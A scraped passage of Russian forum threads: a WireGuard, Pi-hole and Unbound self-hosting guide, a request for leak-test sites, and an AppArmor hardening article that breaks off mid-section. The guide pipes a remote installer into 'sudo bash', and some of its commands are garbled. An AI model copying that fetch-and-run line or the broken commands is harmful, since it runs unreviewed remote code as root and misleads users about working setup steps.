Поиск по локальной сети позволяет двум друзьям в локальной сети найти друг друга, так как DHT отдает приоритет адресам локальной сети над адресами вне локальной сети для DHT пиров. Успешная отправка запроса get node request/bootstrapping от пира должна также добавить его в список пиров DHT, если мы его ищем. Пир не должен быть немедленно добавлен, если пакет LAN discovery с открытым ключом DHT, который мы пингуем, должен быть послан, и должен быть получен правильный ответ, прежде чем мы сможем сказать, что этот пир найден.
Обнаружение локальной сети - это то, как Tox обрабатывает и заставляет все хорошо работать в локальной сети.

Поднимаем свой DNS + Wireguard

ID: 676533bbb4103b69df3719f3
Thread ID: 100952
Created: 2023-10-25T19:13:29+0000
Last Post: 2023-10-26T12:39:22+0000
Author: k0priz
Prefix: Статья
Replies: 1 Views: 446

Всем привет данная статься будет разделенна на 2 части
1.Wireguard и VDS
2.Dnsproxy и pi hole

1.Часть Wireguard и VDS

Покупаем сервер Digital OCean, Timweb,First VDS берите где хотите
Я взял на TimWeb, берем на Debian 12 так как команды будут потспроенны под него
Подключаемся к серверу
-----------------------

Code:Copy to clipboard

apt update -- Обновляем пакеты echo "deb http://deb.debian.org/debian/ unstable main" > /etc/apt/sources.list.d/unstable.list printf 'Package: *\nPin: release a=unstable\nPin-Priority: 90\n' > /etc/apt/preferences.d/limit-unstab apt install wireguard -- устанавлием сам wireguard

-----------------------
Если нет модуля ядра, ставим и его:
apt-get install wireguard-dkms wireguard-tools linux-headers-$(uname -r)
Как только всё будет готово, проверяем, что модуль загружен:
modprobe wireguard && lsmod | grep wireguard
--------------------
После создаем любую папку
mkdir ~/{Название вашей папки} cd ~/{Название вашей папки}
Создаем ключи для сервера и клиента

Code:Copy to clipboard

umask 077 wg genkey | tee server_private_key | wg pubkey > server_public_key wg genkey | tee client_private_key | wg pubkey > client_public_key

-----------------------
Далее через cat смотрим наши ключи

Code:Copy to clipboard

cat server_private_key | cat server_public_key | cat client_private_key | cat client_public_key |

Все ключи запишите ,они еще понадобятся
-----------------------
В sysctl включаем forwarding

Code:Copy to clipboard

nano /etc/sysctl.conf # net.ipv4.ip_forward = 1 sysctl -p

-----------------------
cd /etc/wireguard/ nano /etc/wireguard/wg0.conf

Туда вписываем:

nano /etc/wireguard/wg0.conf

[Interface]
Address = 10.8.0.1/24
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE
ListenPort = 51820
PrivateKey = {Сюда вписываем ваш приватный ключ 'cat server_private_key'}

[Peer]
PublicKey = {Сюда вписываем паблик ключ 'cat client_public_key'}
AllowedIPs = 10.8.0.2/32
-----------------------

Click to expand...

Пока что закрываем файл
По желанию можем защититься и сделать его только для root пользователей командой:
chmod 600 /etc/wireguard/wg0.conf
-----------------------
Включаем и запускаем сервис wireguard

Code:Copy to clipboard

systemctl enable wg-quick@wg0.service systemctl restart wg-quick@wg0.service

-----------------------
Далее вы можете подкючить любое устройство к вашему wireguard я буду показывать на примере мвой системе parrot os

Code:Copy to clipboard

sudo add-apt-repository ppa:wireguard/wireguard или же apt install wireguard cd /etc/wireguard nano /etc/wireguard/wg0-client.conf

[Interface]
Address = 10.8.0.2/32
PrivateKey = {сюда вписываем cat client_private_key}
DNS = 8.8.8.8

[Peer]
PublicKey = {сюда вписываем cat server_public_key}
Endpoint = {На сервере прописываем 'ifconfig' и пишем наш ip}:51820
AllowedIPs = 0.0.0.0/0
PersistentKeepalive = 21

Click to expand...

-----------------------
Сохраняем файл, и пробуем подключиться командой:

wg-quick up wg0-client -- включаем

[#] ip link add wg0-client type wireguard
[#] wg setconf wg0-client /dev/fd/63
[#] ip address add 10.8.0.2/32 dev wg0-client
[#] ip link set mtu 1420 dev wg0-client
[#] ip link set wg0-client up
[#] mount `8.8.8.8' /etc/resolv.conf
[#] wg set wg0-client fwmark 51820
[#] ip -4 route add 0.0.0.0/0 dev wg0-client table 51820
[#] ip -4 rule add not fwmark 51820 table 51820
[#] ip -4 rule add table main suppress_prefixlength 0

Click to expand...

Если выдает такую ошибку /usr/bin/wg-quick: line 32: resolvconf: command not found
То просто пишите 'sudo apt install openresolv' и все.

wg-quick down wg0-client -- выключаем

[#] ip -4 rule delete table 51820
[#] ip -4 rule delete table main suppress_prefixlength 0
[#] ip link delete dev wg0-client
[#] umount /etc/resolv.conf

Click to expand...

Итак мы закончили первую часть статьи ,далее мы будем поднимать свой DNS сервер через pi hole

2.ЧАсть Dnsproxy и pi hole

Будем использовать программу dnsproxy:
--------------------------------------------
Для работы с данным репозиторием нам нужен язык go версии не менее 1.20
Установка или обновления golang

Code:Copy to clipboard

sudo apt update && sudo apt upgrade cd Downloads wget https://golang.org/dl/go1.20.2.linux-amd64.tar.gz sudo tar -C /usr/local -xzf go1.20.2.linux-amd64.tar.gz

Далее добавляем golang в PATH

Code:Copy to clipboard

echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee -a $HOME/.profile source $HOME/.profile go version -- проверяем версию go

Должно вывести:
go version go1.20.2 linux/amd64
--------------------------------------------
устанавливаем dnsproxy
git clone https://github.com/AdguardTeam/dnsproxy make build

если сделать все правильно то ошибок быть не должно
--------------------------------------------
Выбирем на сайте проги любой вариант подключния
./dnsproxy -u sdns://AgcAAAAAAAAABzEuMC4wLjGgENk8mGSlIfMGXMOlIlCcKvq7AVgcrZxtjon911-ep0cg63Ul-I8NlFj4GplQGb_TTLiczclX57DvMV8Q-JdjgRgSZG5zLmNsb3VkZmxhcmUuY29tCi9kbnMtcXVlcnk -- я выбрал этот

Запускаем программу
Если все без ошибок то работаем дальше
--------------------------------------------

1.кликаем на иконку wifi правой конпокой
2.нажимаем edit connection
3.Выбираем сеть к которой вы подключены не вадно wifi или ethernet
4.Выбираем ipv4 Settings
5.в Dns сервер вписываем 127.0.0.1 и вес ваш трафик будет через dns proxy который вы хостите на основной машине

Click to expand...

если все работает и вы разобрались то теперь будес совмещать wireguard и pi hole
--------------------------------------------
Подключаемся к нашему серверу через ssh
Вписываем:

Code:Copy to clipboard

sudo iptables -A INPUT -s 10.8.0.1/24 -p tcp -m tcp --dport 53 -m conntrack --ctstate NEW -j ACCEPT sudo iptables -A INPUT -s 10.8.0.1/24 -p udp -m udp --dport 53 -m conntrack --ctstate NEW -j ACCEPT apt install iptables-persistent apt install curl echo iptables-persistent iptables-persistent/autosave_v4 boolean true | sudo debconf-set-selections echo iptables-persistent iptables-persistent/autosave_v6 boolean true | sudo debconf-set-selections sudo apt install iptables-persistent -y sudo systemctl enable netfilter-persistent sudo netfilter-persistent save

Устанавливаем pi hole
curl -sSL https://install.pi-hole.net | sudo PIHOLE_SKIP_OS_CHECK=true bash

1.После установки выбираем wg0
2.Далее нажмаем yes/continue
3.Привыборе Dns сервере выбрайте любой, потом сдеаем нормальный
4.И выбраем Anonumous режим

Click to expand...

--------------------------------------------
Установим Unbound DNS:

sudo apt install unbound unbound-host -y curl -o /var/lib/unbound/root.hints https://www.internic.net/domain/named.cache

--------------------------------------------

Создаем конфиг /etc/unbound/unbound.conf.d/pi-hole.conf
nano /etc/unbound/unbound.conf.d/pi-hole.conf
Туда вставляем этот текст:

server:

if no logfile is specified, syslog is used

logfile: "/var/log/unbound/unbound.log"

verbosity: 1
port: 5353

do-ip4: yes
do-udp: yes
do-tcp: yes

may be set to yes if you have IPv6 connectivity

do-ip6: no

use this only when you downloaded the list of primary root servers

root-hints: "/var/lib/unbound/root.hints"

respond to DNS requests on all interfaces

interface: 0.0.0.0
max-udp-size: 3072

IPs authorised to access the DNS Serverdig pi-hole.net @127.0.0.1 -p 53

access-control: 0.0.0.0/0 refuse
access-control: 127.0.0.1 allow
access-control: 10.8.0.1/24 allow

hide DNS Server info

hide-identity: yes
hide-version: yes

limit DNS fraud and use DNSSEC

harden-glue: yes
harden-dnssec-stripped: yes
harden-referral-path: yes

add an unwanted reply threshold to clean the cache and avoid, when

possible, DNS poisoning
unwanted-reply-threshold: 10000000

have the validator print validation failures to the log val-log-level: 1

don't use Capitalisation randomisation as it known to cause DNSSEC issues

sometimes

see <https://discourse.pi-hole.net/t/unbound-stubby-or-dnscrypt-

proxy/9378> for further details
use-caps-for-id: no

reduce EDNS reassembly buffer size

suggested by the unbound man page to reduce fragmentation reassembly

problems
edns-buffer-size: 1472

TTL bounds for cache

cache-min-ttl: 3600
cache-max-ttl: 86400

perform prefetching of close to expired message cache entries

this only applies to domains that have been frequently queried

prefetch: yes
prefetch-key: yes

one thread should be sufficient, can be increased on beefy machines

num-threads: 1

ensure kernel buffer is large enough to not lose messages in traffic

spikes
so-rcvbuf: 1m

ensure privacy of local IP ranges

private-address: 192.168.0.0/16
private-address: 169.254.0.0/16
private-address: 172.16.0.0/12
private-address: 10.0.0.0/8
private-address: fd00::/8
private-address: fe80::/10

Click to expand...

Перезагрузи тачку
reboot

Проверяем как все работает , нигде не должно быть ошибок

dig pi-hole.net @127.0.0.1 -p 5353 dig sigfail.verteiltesysteme.net @127.0.0.1 -p 5353 dig sigok.verteiltesysteme.net @127.0.0.1 -p 5353
--------------------------------------------

1.На основной такчке заходим в админку pi hole
2.Заходим в settings там кликаем на dns и в параметр custom вписываем 127.0.0.1#53
3.Далее редактируем конфигурационный файл wireguard на оосновной тачке
4.Редактируем парамет DNS меня его на ip wg0 на сервере
5.После тыкаем на wifi правой конпке
6.Выбираем ipv4 Settings
7.В Dns сервер вписываем 10.8.0.1 и вес ваш трафик будет через dns который теперь хоститься на сервере

Click to expand...

На этом собственно все, в самом pi hole разбрайтесь сами, спасибо за внимание

Подскажите тулзы подобные whatleaks.com

ID: 676533bbb4103b69df371b69
Thread ID: 60030
Created: 2021-12-13T18:32:50+0000
Last Post: 2021-12-30T14:01:14+0000
Author: BOCXOD
Replies: 4 Views: 446

Накидайте линков на эквивалентные по функционалу умершему https://whatleaks.com

🛡️ ОБЯЗАТЕЛЬНЫЙ КОНТРОЛЬ ДОСТУПА LINUX // MAC-СИСТЕМЫ: APPARMOR, SELINUX, TOMOYO/AKARI

ID: 676533bbb4103b69df371a04
Thread ID: 99122
Created: 2023-09-30T11:26:11+0000
Last Post: 2023-09-30T17:15:25+0000
Author: IvanVasilyevich
Prefix: Статья
Replies: 1 Views: 445

О ЧЕМ

СТАТЬЯ

В этой статье рассмотрим, как настраивается AppArmor в Debian Linux: как контролировать доступ приложений к файлам, как создавать свои файлы профилей для новых приложений, готовые профили от Debian и Whonix/Kicksecure, возможность использования полной системной политики (аналогично SELinux в Android) , реализация контроля доступа на основе ролей (RBAC) , списки контроля доступа (ACL) и кратко коснёмся SELinux, TOMOYO/AKARI MAC, RBAC от GRSecurity и того, как работают Pledge и Unveil в OpenBSD.

ВВЕДЕНИЕ

MAC или обязательный контроль доступа это один из видов политики безопасности. Он обеспечивает тонкий контроль над тем, к чему программа может получить доступ. Например, браузер не будет иметь доступа ко всему домашнему каталогу. По сути, это означает, что каждое действие, которое может выполнить программа и которое каким-либо образом влияет на систему, проверяется на соответствие набору правил безопасности. Использование практически любой системы обязательного контроля доступа значительно повышает уровень безопасности, хотя существуют различия в способах ее реализации. Системы MAC можно разделить на два типа: MAC на основе путей к файлам и MAC на основе меток.

MAC на основе пути к файлу довольно легкая форма управления доступом, которая предлагает разрешения на основе пути к файлам. К нему относятся AppArmor (рассматривается как более простая альтернатива SELinux) и TOMOYO/AKARI. Обе эти системы отличаются простотой использования и реализации, требуя очень мало зависимостей. Плюсом является то, что MAC на основе путей может быть реализован на гораздо более широком спектре файловых систем, в отличие от альтернативы на основе меток. Недостатком этого стиля управления доступом является то, что разрешения не переносятся вместе с файлами.

В свою очередь, MAC на основе меток означает, что для управления правами безопасности используются расширенные атрибуты файла. К нему относится лишь SELinux, в котором реализован MAC, полностью отделенный от системных пользователей и ролей. Хотя эта система, возможно, более гибкая в своих предложениях по безопасности, чем MAC на основе пути, она работает только с файловыми системами, поддерживающими эти расширенные атрибуты. Она предлагает чрезвычайно надежную многоуровневую реализацию MAC политики, которая позволяет легко поддерживать контроль над системой. SELinux присваивает метки всем файлам, процессам и объектам и поэтому очень гибок. Однако настройка SELinux считается очень сложной и требует наличия поддерживаемой файловой системы.

APPARMOR

AppArmor активно защищает операционную систему и приложения от внешних и внутренних угроз и даже может смягчить или ограничить "0day", применяя к каждому приложению определенный набор правил. По умолчанию доступ запрещен, если в профиле не указано иное. По умолчанию AppArmor включает несколько политик, а благодаря сочетанию расширенного статического анализа и обучения AppArmor, даже для очень сложных приложений в течение нескольких часов может быть успешно развернут профиль. AppArmor дополняет, а не заменяет дискреционный контроль доступа (DAC, о котором шла речь в предыдущей статье) , благодаря чему невозможно предоставить процессу больше привилегий, чем он имел изначально.

AppArmor использует политики безопасности, называемые профилями, для определения того, к каким системным ресурсам и с какими привилегиями может получить доступ то или иное приложение. В отличие от SELinux, где настройки являются общесистемными, профили в AppArmor настраиваются для каждого приложения. AppArmor отличается от других реализаций MAC в Linux тем, что он основан на путях к файлам и позволяет смешивать профили принудительного и предупредительного исполнения. Кроме того, AppArmor имеет гораздо более низкий барьер для входа, чем SELinux.

Каждое нарушение политики приводит к появлению сообщения в системном журнале логов, а сам AppArmor может быть настроен на уведомление о нарушениях, появляющееся на рабочем столе в режиме реального времени. Для упрощения настройки системы в состав AppArmor уже входит набор профилей по умолчанию, которые запускаются после установки. Если же готового профиля не нашлось, то создать его помогут специальные утилиты "aa-genprof" и "aa-logprof". Разработчики AppArmor считают, что безопасность не должна идти в ущерб простоте, ведь чем сложнее система, тем больше вероятность ее неправильной конфигурации.

AppArmor обеспечивает ряд преимуществ:

[+] Защита операционной системы и приложений от внешних и внутренних угроз, включая ограничение или нейтрализацию "0day";

[+] Смягчает последствия эксплуатации неизвестных недостатков приложений;

[+] Политики безопасности AppArmor определяют, к каким системным ресурсам и с какими привилегиями могут обращаться отдельные приложения. Например: доступ к сети, доступ к сокетам, разрешения на чтение, запись или выполнение файлов по определенным путям.

УСТАНОВКА

APPARMOR

Сначала установим инструменты AppArmor. В некоторых дистрибутивах Linux они устанавливаются по умолчанию вместе с некоторыми профилями, как, например, в Ubuntu или OpenSUSE. В Debian Linux их можно установить с помощью команды:

Bash:Copy to clipboard

sudo apt install apparmor apparmor-utils sudo systemctl enable apparmor sudo systemctl start apparmor

Для включения AppArmor необходимо добавить дополнительные параметры загрузки. Если в качестве загрузчика используется Grub, то необходимо отредактировать файл "/etc/default/grub" и добавить в строку "GRUB_CMDLINE_LINUX_DEFAULT=" следующие параметры, не ставя запятых при перечислении:

Code:Copy to clipboard

apparmor=1 security=apparmor

Затем необходимо обновить конфигурацию Grub (после этого также следует перезагрузиться) :

Bash:Copy to clipboard

sudo update-grub

Узнать, включен ли AppArmor, можно с помощью команды (если показывает Y, то включен) :

Bash:Copy to clipboard

cat /sys/module/apparmor/parameters/enabled

Следует помнить, что простое включение любой MAC системы не приведет к магическому повышению уровня безопасности. Для ее полноценного использования необходимы строгие политики. Теперь мы можем перейти к работе с Apparmor.

КОНЦЕПЦИЯ ПРОФИЛЕЙ APPARMOR

Профили AppArmor загружаются при запуске системы. Режим профиля определяет обработку правил если произойдет какое-то событие. AppArmor имеет несколько режимов работы профилей:

[+] Enforce Mode - ядро обеспечивает выполнение правил, указанных в файле профиля, все нарушения блокируются и записываются в файл журнала логов. Проще говоря, операции, нарушающие политику профиля, будут заблокированы;

[+] Complain Mode - режим обучения, AppArmor будет только регистрировать нарушения, ничего не блокируя. Он идеально подходит для тестирования профилей. Возможные ошибки или нарушения доступа могут быть обнаружены и исправлены до перевода профиля в принудительный режим;

[+] Unconfined Mode - ограничения не применяются.

AppArmor предоставляет инструмент командной строки для проверки загруженных профилей. Некоторые профили поставляются в режиме жалоб, чтобы пользователи могли протестировать их, выбрать подходящие и при необходимости улучшить. Можно выполнить команду "aa-status", чтобы увидеть список всех загруженных профилей для приложений и процессов вместе с их статусом:

Bash:Copy to clipboard

sudo aa-status apparmor module is loaded. 25 profiles are loaded. 13 profiles are in enforce mode. ... 0 profiles are in complain mode. 0 processes have profiles defined. 0 processes are in enforce mode. 0 processes are in complain mode. 0 processes are unconfined but have a profile defined.

После выполнения команды мы видим, что загружено 25 профилей, 13 из которых находятся в принудительном режиме (Enforce Mode) , и 0 в режиме обучения (Complain Mode). При дальнейшем рассмотрении списка можно увидеть, сколько процессов попадает под наши профили. В стандартной установке не нашлось профилей для некоторых процессов, если установить или создать такие профили, то они могут быть запущены в режиме блокировки, и определенные процессы не смогут получить доступ к ресурсам которые не указаны в профиле. Также могут быть процессы, которые не настроены, это связано с тем, что они были запущены до запуска AppArmor, чтобы ими можно было управлять, необходимо просто перезапустить их. Большинство стандартных профилей Debian предназначены только для серверных утилит и браузеров, если мы хотим контролировать другие программы, то должны добавить готовые профили или создать их самостоятельно.

Папка AppArmor "/etc/apparmor.d" имеет следующую структуру:

[+] "/usr.bin.профиль" - файлы профиля для программы. Файлы именуются через точку, что соответствует пути к ним;

[+] "/local/" - каталог для переопределений или расширений профилей AppArmor;

[+] "/abstractions/" - механизм абстракций представляет собой гибкий способ группировки общих требований к доступам AppArmor для всех профилей;

[+] "/tunables/" - каталог переменных;

[+] "/disable/" - каталог, содержащий символические ссылки на отключенные профили;

[+] "/force-complain/" - каталог профилей с принудительным режимом жалоб.

СИНТАКСИС ПРОФИЛЯ APPARMOR

Доступны следующие разрешения:

[+] "r" - разрешить чтение;

[+] "w" - разрешить запись;

[+] "a" - разрешить запись в конец файла;

[+] "px" - разрешить запуск новых процессов, если для них существует профиль;

[+] "Px" - разрешить запуск новых процессов, если для них есть профиль, и очистить переменные окружения;

[+] "ix" - разрешить запуск нового процесса под профилем текущего процесса;

[+] "m" - разрешить загрузку в память и запуск исполняемых файлов;

[+] "l" - разрешить создание символических ссылок на исполняемые файлы;

[+] "k" - разрешить блокировку файлов;

[+] "ux" - не контролировать новые процессы;

[+] "Ux" - не контролировать новые процессы и очистить переменные окружения.

Этих разрешений достаточно для управления, но кроме списка файлов и их разрешений, файл профиля содержит директивы "include" и "capability":

[+] "include" - позволяет включать другие файлы с разрешениями, они находятся в папке "/etc/apparmor.d/abstractions/". Это те же части профиля, со списком файлов и разрешений. Они облегчают создание новых профилей;

[+] "capability" - записи разрешений определяют, какие разрешения может использовать ограниченный процесс. Программа может обращаться к ядру, используя системные вызовы, и Apparmor контролирует и эти вызовы. Просмотреть все доступные вызовы можно с помощью команды "man capabilities";

[+] Записи пути - описывает, к каким файлам в файловой системе имеет доступ приложение;

[+] Сетевые записи - определяет тип соединения. Например: "tcp".

В качестве примера рассмотрим профиль "/etc/apparmor.d/bin.ping":

Code:Copy to clipboard

#include <tunables/global> /bin/ping flags=(complain) { #include <abstractions/base> #include <abstractions/consoles> #include <abstractions/nameservice> capability net_raw, capability setuid, network inet raw, /bin/ping mixr, /etc/modules.conf r, }

" #include <tunables/global>" - включает операторы из других файлов. Это позволяет разместить в одном общем файле операторы, относящиеся к нескольким приложениям. " /bin/ping flags=(complain)" - путь к программе, управляемой профилем, также задающий режим жалоб/обучения. "capability net_raw" позволяет приложению получить доступ к возможностям "CAP_NET_RAW". " /bin/ping mixr" - разрешает приложению доступ к чтению и выполнению файла.

СОЗДАНИЕ ПРОФИЛЕЙ APPARMOR

Создать профиль для AppArmor не так сложно, как может показаться на первый взгляд. Поскольку для редко используемого приложения или скрипта может не быть готового профиля, полезно научиться создавать его самостоятельно, не обязательно анализировать длинные журналы логов и писать профиль самостоятельно, в большинстве случаев достаточно воспользоваться автоматическими утилитами, они позволят создать хороший профиль, который будет хорошо работать, но для серьезных программ и серьезной защиты все равно потребуется ручное редактирование.

Для создания профиля мы будем использовать следующие инструменты:

[+] "aa-autodep" - инициализирует профиль AppArmor (используется при ручном написании профилей) ;

**[+] "aa-genprof" **- выполняет наполнение профиля AppArmor правилами и разрешениями (умеет самостоятельно создавать профиль и инициализировать его);

[+] "aa-logprof" - вносит изменения в профиль AppArmor.

Новые профили AppArmor могут быть созданы сразу с помощью "aa-genprof" или сначала с помощью "aa-autodep", а затем настроены с помощью "aa-genprof". Правила создаются в интерактивном режиме с помощью инструмента "aa-logprof", входящего в состав пакета AppArmor. Профиль создается в режиме жалоб, но после тестирования его можно перевести в принудительный режим с помощью команды "aa- enforce". В этом случае политика, заданная правилами соответствующего профиля, будет строго соблюдаться. При необходимости дополнительные правила могут быть добавлены с помощью команды "aa-logprof", а в режим жалобы профиль может быть возвращен командой "aa-complain".

Важно отметить, что "aa-logprof" также содержит запрещающие правила, в которых нет особой необходимости, поскольку базовая логика AppArmor запрещает все, что не разрешено правилом в явном виде. Однако запрещающие правила служат дополнительным целям, например, запрещающие правила имеют приоритет над разрешающими. Они часто используются во многих абстракциях, расположенных в каталоге "/etc/apparmor.d/abstractions", чтобы блокировать любой общесистемный доступ к важным папкам или файлам, несмотря на другие профили AppArmor. Это гарантирует, что случайно созданные правила не дадут профилю лишних опасных разрешений.

Одной из наиболее сложных проблем является определение тех утилит, сервисов и программ, которые требуют защиты. Здесь на помощь приходит утилита "aa- unconfined" из набора инструментов AppArmor. Не секрет, что наибольшую опасность представляют программы, доступ к которым осуществляется по сети. Утилита предоставит список запущенных программ, имеющих открытые TCP и UDP порты, а также укажет наличие или отсутствие профилей для этих программ (опция "--paranoid" рядом с этой командой дополнит список всеми процессами из "/proc", имеющими TCP и UDP порты):

Bash:Copy to clipboard

sudo aa-unconfined 2393 /usr/sbin/avahi-daemon not confined 3562 /usr/sbin/cupsd not confined 5380 /usr/sbin/hpiod not confined 6492 /usr/sbin/mysqld not confined 6524 /usr/lib/postfix/master confined 6824 /usr/sbin/dovecot not confined

Процесс автоматического создания профиля выглядит следующим образом: мы используем "aa-genprof" для мониторинга активности приложения во время выполнения, чтобы AppArmor узнал все, что ему необходимо. В процессе нам будет предложено подтвердить и выбрать поведение, которое требуется при определенных обстоятельствах. После создания профиля при необходимости можно использовать утилиту "aa-logprof" для внесения корректировок в ходе тестирования в режиме жалоб, если возникнут какие-либо проблемы. После редактирования профиля его следует перезагрузить.

Сначала установим демон аудирования и запустим его:

Bash:Copy to clipboard

sudo apt install auditd sudo systemctl enable auditd sudo systemctl start auditd

Проведем профилирование программы, чтобы определить, какие файлы и доступы ей нужны, чтобы добавить их в профиль (в нашем случае для примера "man"):

Bash:Copy to clipboard

sudo aa-genprof man

Теперь необходимо запустить программу в отдельном окне терминала и выполнить все действия, которые она может делать, или только те, которые мы собираемся использовать, проще говоря, начать пользоваться ею как обычно. После этого необходимо нажать кнопку S (Scan) в первом окне терминала, в котором происходит работа "aa-autodep".:

Bash:Copy to clipboard

man cat

В процессе профилирования программа будет задавать вопросы о разрешении тех или иных действий или доступа к определенным путям (ответы на вопросы чередуются между Inherit (Наследовать) и Allow (Разрешить)).

Если интересно предварительно посмотреть на профиль, можно нажать V (View) , после всех ответов, если все устраивает, нажмем S (Save) , а затем F (Finish) для завершения работы утилиты.

AppArmor определит, к чему обращается программа, и добавит все в профиль с определенными разрешениями в зависимости от ответов на заданные вопросы. Если затем потребуется внести дополнительные правки в профиль необходимо воспользоваться "aa-logprof". Однако создание качественных профилей по прежнему осуществляется путем ручного написания политик.

Каждый профиль должен быть загружен в AppArmor, прежде чем он начнет работать. Включим принудительный режим, после чего проверим, работает ли программа (необходимо указать полный путь к профилю программы, в нашем случае "/etc/apparmor.d/usr.bin.man"):

Bash:Copy to clipboard

sudo aa-enforce /etc/apparmor.d/usr.bin.man

Если в профиль были внесены изменения, то для вступления изменений в силу его необходимо перезагрузить, для этого необходимо выполнить команду:

Bash:Copy to clipboard

sudo apparmor_parser -a /etc/apparmor.d/профиль.программы

Перезагрузить все профили можно с помощью команды:

Bash:Copy to clipboard

sudo systemctl reload apparmor

ГОТОВЫЕ ПРОФИЛИ APPARMOR

Debian предоставляет различные готовые профили AppArmor, в том числе и экспериментальные, для широкого спектра приложений и процессов. Они упакованы в: "apparmor-profiles" и "apparmor-profiles-extra", и расположены по умолчанию в каталоге "/etc/apparmor.d/", приложения также могут автоматически устанавливать свои собственные профили в этот каталог. Некоторые профили находятся в режиме жалоб, поскольку сопровождающие Debian не считают их достаточно зрелыми. Экспериментальные профили находятся в каталоге "/usr/share/apparmor/extra-profiles", но не следует ожидать, что эти профили будут работать из коробки, если они используются, может потребоваться ручное редактирование или использование "aa-logprof".

Начнем с установки профилей в Debian Linux:

Bash:Copy to clipboard

sudo apt install apparmor-profiles apparmor-profiles-extra

Дополнительные экспериментальные профили, не включенные по умолчанию "apparmor-profiles-extra", находятся в папке "/usr/share/apparmor/extra- profiles/". Посмотреть содержимое этой папки можно командой:

Bash:Copy to clipboard

ls /usr/share/apparmor/extra-profiles/

Имеются как обычные серверные профили, так и профили для десктопных приложений, таких как браузеры и почтовые клиенты. Если какое-либо из этих приложений используется и есть желание включить для него профиль, необходимо скопировать этот профиль в стандартный каталог профилей:

Bash:Copy to clipboard

sudo cp /usr/share/apparmor/extra-profiles/профиль /etc/apparmor.d/

Или можно скопировать все экспериментальные профили:

Bash:Copy to clipboard

sudo cp /usr/share/apparmor/extra-profiles/* /etc/apparmor.d

После этого, если нет уверенности, что профиль будет работать корректно, можно включить его в режиме жалоб:

Bash:Copy to clipboard

sudo aa-complain /etc/apparmor.d/профиль

Если профиль протестирован или есть уверенность, что он работает корректно, можно включить его в принудительном режиме:

Bash:Copy to clipboard

sudo aa-enforce /etc/apparmor.d/профиль

Если необходимо отключить конкретный профиль, нужно найти его имя в каталоге "/etc/apparmor.d/" и выполнить команду:

Bash:Copy to clipboard

sudo aa-disable /etc/apparmor.d/профиль

Можно также включить все профили, например, для тестирования:

Bash:Copy to clipboard

sudo aa-enforce /etc/apparmor.d/*

Или отключить все профили Apparmor, если это необходимо:

Bash:Copy to clipboard

sudo aa-disable /etc/apparmor.d/*

ПРОФИЛИ WHONIX/KICKSECURE

Whonix/Kicksecure предоставляют профили, которые можно дополнительно использовать вместе с профилями Debian:

[+] "apparmor-profile-hexchat" - профиль AppArmor для ограничения IRC HexChat;

[+] "apparmor-profile-thunderbird" - профиль AppArmor для ограничения Thunderbird. Этот профиль является расширением исходного профиля Debian AppArmor;

[+] "apparmor-profile-torbrowser" - профиль AppArmor для ограничения Tor Browser;

[+] "apparmor-profiles-kicksecure" - мета-пакет, объединяющий все вышеперечисленные профили.

Установка в Debian Linux. Для начала скачаем ключ подписи репозитория:

Bash:Copy to clipboard

wget https://www.kicksecure.com/keys/derivative.asc

Затем добавим ключ подписи:

Bash:Copy to clipboard

sudo cp ~/derivative.asc /usr/share/keyrings/derivative.asc

Добавим репозиторий для Debian 12 Bookworm:

Bash:Copy to clipboard

echo "deb [signed-by=/usr/share/keyrings/derivative.asc] https://deb.kicksecure.com bookworm main contrib non-free" | sudo tee /etc/apt/sources.list.d/derivative.list

Если нет желания возиться с этими командами, можно воспользоваться утилитой "extrepo", Kicksecure присутствует в ней:

Bash:Copy to clipboard

sudo apt install extrepo sudo extrepo enable kicksecure

Обновим репозитории пакетов и установим:

Bash:Copy to clipboard

sudo apt update && sudo apt install apparmor-profiles-kicksecure

Затем можно включить необходимые профили:

Bash:Copy to clipboard

sudo aa-enforce /etc/apparmor.d/профиль

ПОЛНАЯ СИСТЕМНАЯ ПОЛИТИКА APPARMOR

Еще один шаг вперед это создание полной системной MAC политики AppArmor, ограничивающей все процессы пользовательского пространства, как это сделано в Android с помощью SELinux. AppArmor часто развертывается с помощью целевой политики, применяемой только к приложениям, которые считаются чувствительными к безопасности, но большинство других процессов (включая init) запускаются без ограничений. AppArmor также может использоваться для формирования полной системной политики. Это важно и необходимо для создания надежной модели безопасности, реализующей принцип наименьших привилегий. В сочетании с технологиями песочниц (например, bubblewrap) , усилением безопасности ядра и виртуализацией можно создать глубоко эшелонированную защиту системы.

Идея состоит в том, чтобы ограничить все процессы пользовательского пространства в системе. AppArmor для "init", загрузка SystemD в "initramfs", который затем применяется ко всем остальным процессам. Для многих системных служб и приложений потребуются специальные политики, чтобы все процессы порождались процессом инициализации и каждый процесс (кроме процессов ядра) автоматически ограничивался, включая все "/" (/usr/bin и т.д.). Таким образом, при установке сомнительной программы она по умолчанию будет максимально ограничена, и если она попытается выполнить недокументированные или вредоносные действия, то будет запрещена к выполнению, а пользователь получит уведомление.

Помимо блокировки пользовательского пространства, это также может защитить ядро и уменьшить количество утечек, ограничив доступ к таким интерфейсам ядра, как "/proc" или "/sys". В "/proc" происходит утечка большого количества информации о других процессах, что позволяет непривилегированному пользователю или программе шпионить за определенными процессами. Примером может служить "/proc/pid/sched", позволяющий отслеживать нажатия клавиш, но утечка информации здесь, безусловно, гораздо больше (например, "/proc/cpuinfo" позволяет локально запущенной программе или скрипту связывать разные системы или виртуальные машины на одном компьютере). Отчасти ситуацию можно улучшить, наложив на "/proc" детальные ограничения.

Концепция заключается в интеграции со сценариями, запускающими "init" в среде "initramfs" для загрузки в ядро политики, которая будет применяться к "PID 1" в системе. Однако это требует очень большой работы и серьезного тестирования. На данный момент ни в одном дистрибутиве Linux нет ничего приближенного, кроме Android (также по сути это присутствует в отечественном Astra Linux, но только в лицензионных версиях) , но приложения для Android гораздо проще и содержательнее по дизайну, что делает возможным общесистемный SELinux. Все, что мы имеем на данный момент в этом направлении, это потрясающая реализация Pledge и Unveil в OpenBSD, разработка "apparmor-profile-everything", тестируемая в Whonix/Kicksecure, и RBAC от GRSecurity, в котором, пожалуй, наиболее развито автоматическое профилирование, но, несмотря на запуск всех программ и использование всех необходимых функций, в нем есть много непонятных ошибок, которые легко исправить (но, к сожалению, GRSecurity поставляется только по лицензии).

APPARMOR-PROFILE-EVERYTHING ОТ WHONIX/KICKSECURE

